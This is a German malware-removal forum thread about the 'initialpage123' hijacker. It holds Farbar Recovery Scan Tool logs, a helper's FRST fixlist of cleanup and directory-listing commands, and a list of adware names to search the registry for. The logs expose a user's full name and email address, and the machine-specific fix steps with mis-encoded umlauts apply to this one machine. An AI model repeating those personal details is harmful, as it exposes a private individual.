Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 53.0.3 (x64 de) (HKLM\...\Mozilla Firefox 53.0.3 (x64 de)) (Version: 53.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0.3 - Mozilla)
OpenOffice 4.1.3 (HKLM-x32\...\{8D5FCC56-BB9F-4122-923C-71753F50F6F5}) (Version: 4.13.9783 - Apache Software Foundation)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.77242 - TeamViewer)
VirtualDJ 8 (HKLM-x32\...\{2C513174-818D-4D9E-B88F-3E2872BACA20}) (Version: 8.2.3493.0 - Atomix Productions)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.40 (32-Bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-3847841184-804715454-2304624315-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Nick Schuster\AppData\Local\Microsoft\OneDrive\17.3.6799.0327\amd64\FileCoAuthLib64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3847841184-804715454-2304624315-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {05D48E00-BF2C-4CEB-B7DF-04409233784E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-17] (Google Inc.)
Task: {49A10F24-190A-4ED7-9B48-C3CB6BBBC914} - System32\Tasks\GenericSettingsHandler\Windows-Credentials\RetrySyncTask_for_S-1-5-21-3847841184-804715454-2304624315-1001
Task: {53A67BD4-6351-4805-A436-9353CBFAAAFA} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-wiiu02015@outlook.de => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe 
Task: {6557BCB6-2F27-448C-ACA4-7E86E4B009E5} - \Update -> Keine Datei <==== ACHTUNG
Task: {673824BA-7A3C-41BF-A4DA-9C4F9887830A} - System32\Tasks\Red Giant Link => C:\Program Files\Red Giant Link\Red Giant Link.exe 
Task: {9376D540-EE5F-4016-8595-273CB525CC42} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2017-05-23] (Microsoft Corporation)
Task: {9C8653D0-0863-4F6C-BDC9-E813956ACA92} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe 
Task: {B8732800-4537-42E1-8E92-0D38D2678C49} - System32\Tasks\OneDrive Standalone Update Task v2 => C:\Users\Nick Schuster\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe [2017-05-13] ()
Task: {D4BAA7ED-86EB-4B60-9F30-8E2D64B7D175} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-09] (Adobe Systems Incorporated)
Task: {DBE77801-9F7F-4CE7-9DE2-FDB39098637C} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_25_0_0_171_pepper.exe [2017-05-09] (Adobe Systems Incorporated)
Task: {F6691563-4A82-4630-97F5-2AD5B410283B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-17] (Google Inc.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verkn黳fungen =============================

(Die Eintr鋑e k鰊nen gelistet werden, um sie zur點kzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-02-27 11:37 - 2016-02-04 12:53 - 00387144 _____ () C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
2017-06-05 15:57 - 2017-05-31 11:09 - 02270664 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2015-08-09 05:50 - 2016-10-07 00:07 - 00393208 _____ () C:\Windows\system32\igfxTray.exe

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verkn黳fungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zur點kgesetzt oder entfernt.)


==================== Internet Explorer Vertrauensw黵dig/Eingeschr鋘kt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn ben鰐igt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zur點kzusetzen.)

2016-11-23 18:06 - 2017-06-05 15:51 - 00000832 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix f黵 diesen Bereich.)

HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows Photo Viewer\Hintergrundbild der Windows-Fotoanzeige.jpg
DNS Servers: 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Eintr鋑e ==

MSCONFIG\Services: BDESVC => 3
MSCONFIG\Services: BITS => 2
MSCONFIG\Services: DbxSvc => 2
MSCONFIG\Services: KingoSoftService => 2
MSCONFIG\Services: SysLinkMapper => 2
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "AirServer64"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "BlueStacks Agent"
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKLM\...\StartupApproved\Run32: => "KiesTrayAgent"
HKLM\...\StartupApproved\Run32: => "IJNetworkScannerSelectorEX"
HKLM\...\StartupApproved\Run32: => "CanonQuickMenu"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Spotify Web Helper"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Spiele Post"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Google Updater 2.0"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Wiederherstellungspunkte =========================

28-05-2017 11:43:38 Windows Update
28-05-2017 20:39:08 DirectX wurde installiert
30-05-2017 14:03:51 Removed Samsung Kies
31-05-2017 17:31:09 Removed Vegas Pro 13.0 (64-bit)
01-06-2017 21:49:48 Installed NetAdapterUpdate

==================== Fehlerhafte Ger鋞e im Ger鋞emanager =============

Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: USB2.0-CRW
Description: USB2.0-CRW
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Fehlereintr鋑e in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (06/05/2017 04:59:21 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/05/2017 04:59:21 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/05/2017 04:59:21 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/05/2017 04:59:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LiveComm.exe, Version: 17.5.9600.20911, Zeitstempel: 0x559467ee
Name des fehlerhaften Moduls: msvcr120_app.dll, Version: 12.0.21005.1, Zeitstempel: 0x524f8432
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000000000001ef5f
ID des fehlerhaften Prozesses: 0xf58
Startzeit der fehlerhaften Anwendung: 0x01d2de0c4e300573
Pfad der fehlerhaften Anwendung: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
Pfad des fehlerhaften Moduls: C:\Program Files\WindowsApps\Microsoft.VCLibs.120.00_12.0.21005.1_x64__8wekyb3d8bbwe\msvcr120_app.dll
Berichtskennung: 8befa251-49ff-11e7-8424-0071c2420bd3
Vollst鋘diger Name des fehlerhaften Pakets: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: ppleae38af2e007f4358a809ac99a64a67c1

Error: (06/05/2017 04:59:16 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LiveComm.exe, Version: 17.5.9600.20911, Zeitstempel: 0x559467ee
Name des fehlerhaften Moduls: msvcr120_app.dll, Version: 12.0.21005.1, Zeitstempel: 0x524f8432
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000000000001ef5f
ID des fehlerhaften Prozesses: 0xf20
Startzeit der fehlerhaften Anwendung: 0x01d2de0c4d73a939
Pfad der fehlerhaften Anwendung: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
Pfad des fehlerhaften Moduls: C:\Program Files\WindowsApps\Microsoft.VCLibs.120.00_12.0.21005.1_x64__8wekyb3d8bbwe\msvcr120_app.dll
Berichtskennung: 8b334783-49ff-11e7-8424-0071c2420bd3
Vollst鋘diger Name des fehlerhaften Pakets: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: ppleae38af2e007f4358a809ac99a64a67c1

Error: (06/05/2017 04:59:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LiveComm.exe, Version: 17.5.9600.20911, Zeitstempel: 0x559467ee
Name des fehlerhaften Moduls: msvcr120_app.dll, Version: 12.0.21005.1, Zeitstempel: 0x524f8432
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000000000001ef5f
ID des fehlerhaften Prozesses: 0xc2c
Startzeit der fehlerhaften Anwendung: 0x01d2de0c42df3067
Pfad der fehlerhaften Anwendung: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
Pfad des fehlerhaften Moduls: C:\Program Files\WindowsApps\Microsoft.VCLibs.120.00_12.0.21005.1_x64__8wekyb3d8bbwe\msvcr120_app.dll
Berichtskennung: 877e5c32-49ff-11e7-8424-0071c2420bd3
Vollst鋘diger Name des fehlerhaften Pakets: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: ppleae38af2e007f4358a809ac99a64a67c1

Error: (06/05/2017 04:59:04 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „Microsoft.WindowsAlarms_8wekyb3d8bbwe!App“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/05/2017 04:53:14 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/05/2017 04:53:14 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/05/2017 04:53:09 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LiveComm.exe, Version: 17.5.9600.20911, Zeitstempel: 0x559467ee
Name des fehlerhaften Moduls: msvcr120_app.dll, Version: 12.0.21005.1, Zeitstempel: 0x524f8432
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000000000001ef5f
ID des fehlerhaften Prozesses: 0x564
Startzeit der fehlerhaften Anwendung: 0x01d2de0b72b41623
Pfad der fehlerhaften Anwendung: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
Pfad des fehlerhaften Moduls: C:\Program Files\WindowsApps\Microsoft.VCLibs.120.00_12.0.21005.1_x64__8wekyb3d8bbwe\msvcr120_app.dll
Berichtskennung: b07ae67c-49fe-11e7-8423-0071c2420bd3
Vollst鋘diger Name des fehlerhaften Pakets: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: ppleae38af2e007f4358a809ac99a64a67c1


Systemfehler:
=============
Error: (06/05/2017 04:59:19 PM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/05/2017 04:59:17 PM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/05/2017 04:59:16 PM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/05/2017 04:58:58 PM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "App.AppX2tphb21dp9jkkycchwvscnrxk12cys3z.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/05/2017 04:53:10 PM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/05/2017 04:53:09 PM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/05/2017 04:23:13 PM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/05/2017 04:23:12 PM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/05/2017 04:08:14 PM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/05/2017 04:08:13 PM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.


CodeIntegrity:
===================================
  Date: 2017-05-03 18:07:17.434
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 18:06:29.117
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 17:37:01.065
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 17:37:00.358
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 17:24:33.560
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 15:20:35.981
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-03-30 16:06:23.178
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-03-30 14:48:35.444
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-03-30 14:48:35.282
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-03-30 14:48:35.275
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i5-5200U CPU @ 2.20GHz
Prozentuale Nutzung des RAM: 38%
Installierter physikalischer RAM: 4014.84 MB
Verf黦barer physikalischer RAM: 2479.09 MB
Summe virtueller Speicher: 4718.84 MB
Verf黦barer virtueller Speicher: 3285.92 MB

==================== Laufwerke ================================

Drive c: (NexusLap) (Fixed) (Total:869.8 GB) (Free:768.42 GB) NTFS
Drive d: (Recover) (Fixed) (Total:60 GB) (Free:42.31 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: B8E472D2)

Partition: GPT.

==================== Ende von Addition.txt ============================
         

Alt 06.06.2017, 10:11   #10
M-K-D-B
/// TB-Ausbilder
 
wie kann ich den  ,,initialpage123创 virus beseitigen? - Standard

wie kann ich den ,,initialpage123创 virus beseitigen?



Servus,



das sieht schon viel besser aus...
Wir sind aber noch nicht fertig.






Schritt 1
  • Deinstalliere Google Chrome 黚er die Systemsteuerung. (Bebilderte Anleitung)
  • Setze bei der Deinstallation auch einen Haken vor Auch die Browserdaten l鰏chen (oder so 鋒nlich).
  • Starte den Rechner im Anschluss neu auf.
  • Installiere Google Chrome neu (falls ben鰐igt). Keine Erweiterungen/Plugins installieren und nicht mit einem evtl. vorhandenen Konto verbinden/synchronisieren.





Schritt 2
  • Kopiere den Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
    CloseProcesses:
    C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\PROFILES
    2017-05-07 13:16 - 2016-12-17 15:58 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Chromium
    Task: {6557BCB6-2F27-448C-ACA4-7E86E4B009E5} - \Update -> Keine Datei <==== ACHTUNG
    HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Google Updater 2.0"
    HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ACHTUNG
    CMD: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"
    CMD: reg query "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Svchost"
    CMD: dir "%ProgramFiles%"
    CMD: dir "%ProgramFiles(x86)%"
    CMD: dir "%ProgramData%"
    CMD: dir "%Appdata%"
    CMD: dir "%LocalAppdata%"
    CMD: dir "%CommonProgramFiles(x86)%"
    CMD: dir "%CommonProgramW6432%"
    CMD: dir "%UserProfile%"
    CMD: dir "C:\"
    EmptyTemp:
    End::
             
  • Starte nun FRST und klicke den Entfernen Button.
  • Das Tool f黨rt die gew黱schten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich die FRST/FRST64.exe befindet.
  • Gegebenenfalls muss dein Rechner daf黵 neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner n鋍hsten Antwort.





Schritt 3
  • Starte FRST erneut.
  • Kopiere den Inhalt der folgenden Code-Box in die Zeile "Suche":
    Code:
    ATTFilter
    SwytShop;Interstat;Plumbytes;KUAIZIP;initialsite123;Speedownloader;Socia2Sear;EnigmaSoftwareGroup;HDWallpaper;AppTrailers;WiperSoft;DownloadProtect;SpyHunter;betterads;amule;OtherSearch;System Healer;ZipTool;iSafe;Softlink;AdvinstAnalytics;gplyra;Qizsywosale Core;Phucusy;Anerpe;Grerdaentlerveck;Minerent;ourluckysites;trotux;Everness;ProxyGate;Elex-tech;Applemy;Minerent;Arucerther;AdvinstAnalytics;Cerzaentfisuge;ttwifi;Quick Tharks Screen Saver;SoftUpgrade;devnull;Grerdaentlerveck;Draveingplererward;VideoMemoryDiagnostic;Prfasaretaly;pccleanplus;Babylon;terana;CSHMDR;CWASRE;NPASRE;VNASRE;ANSARE;background_fault;WANARE;SNAREA;SNARE;SNARER;Yeshat;BrowserModule;Kyubey;BikaQRss;WinSAPSvc;Mikghbiritain;
             
  • Dr點ke auf Registry-Suche.
  • FRST beginnt mit dem Suchlauf. Dies kann einige Zeit dauern.
  • Am Ende erstellt FRST eine Textdatei SearchReg.txt.
  • Poste mir deren Inhalt mit deiner n鋍hsten Antwort.





Schritt 4
  • Starte die FRST erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist.
  • Setze einen Haken vor Dateiliste 90 Tage und dr點ke auf Untersuchen.
  • FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner n鋍hsten Antwort.





Bitte poste mit deiner n鋍hsten Antwort
  • die Logdatei des FRST-Fix,
  • die Logdatei des Registry-Suchlaufs,
  • die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt).
__________________
Gru
M-K-D-B


==========================================================
offline vom 22.12.2018 bis 01.01.2019
==========================================================

Das Trojaner-Board unterst黷zen

Alt 07.06.2017, 11:14   #11
NexsReloaded
 
wie kann ich den  ,,initialpage123创 virus beseitigen? - Standard

wie kann ich den ,,initialpage123创 virus beseitigen?



Code:
ATTFilter
Zus鋞zliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 05-06-2017
durchgef黨rt von Nick Schuster (07-06-2017 11:11:32)
Gestartet von C:\Users\Nick Schuster\Desktop\anti trojan\killer.exe
Windows 8.1 (Update) (X64) (2015-12-26 14:37:47)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3847841184-804715454-2304624315-500 - Administrator - Disabled)
Gast (S-1-5-21-3847841184-804715454-2304624315-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3847841184-804715454-2304624315-1003 - Limited - Enabled)
Nick Schuster (S-1-5-21-3847841184-804715454-2304624315-1001 - Administrator - Enabled) => C:\Users\Nick Schuster

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" k鰊nen in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe After Effects CC 2015 (HKLM-x32\...\{147EC100-14BE-45EF-AB42-35BAEE7D02F0}) (Version: 13.6.1 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Adobe Flash Player 25 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Adobe Photoshop CS6 Version 13.0.1 (HKLM-x32\...\{A724DC44-6241-42D3-BA57-778B178ABC17}_is1) (Version: 13.0.1 - Adobe Systems, Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.7.0.0 - Canon Inc.)
